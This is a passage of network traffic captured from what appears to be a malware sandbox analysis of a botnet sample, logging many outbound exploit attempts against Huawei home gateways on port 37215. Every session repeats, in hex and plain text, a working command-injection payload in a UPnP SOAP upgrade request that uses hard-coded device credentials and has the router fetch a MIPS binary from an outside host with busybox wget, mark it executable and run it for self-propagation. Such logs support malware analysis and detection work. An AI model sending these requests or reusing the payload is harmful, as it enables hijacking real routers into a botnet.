                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1994192.168.2.155976641.229.104.10437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.025196075 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1995192.168.2.1542300197.173.34.637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.025232077 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1996192.168.2.1533096136.230.179.15037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.040924072 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1997192.168.2.1550894197.155.223.6037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.040961027 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1998192.168.2.15566825.237.209.11337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.040987015 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1999192.168.2.1555110197.246.98.24137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.041059017 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2000192.168.2.1538756157.39.10.137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.041131973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2001192.168.2.155520041.168.173.11537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.041163921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2002192.168.2.1542874140.55.109.14137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.041194916 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2003192.168.2.1546322157.10.148.23037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.073024035 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
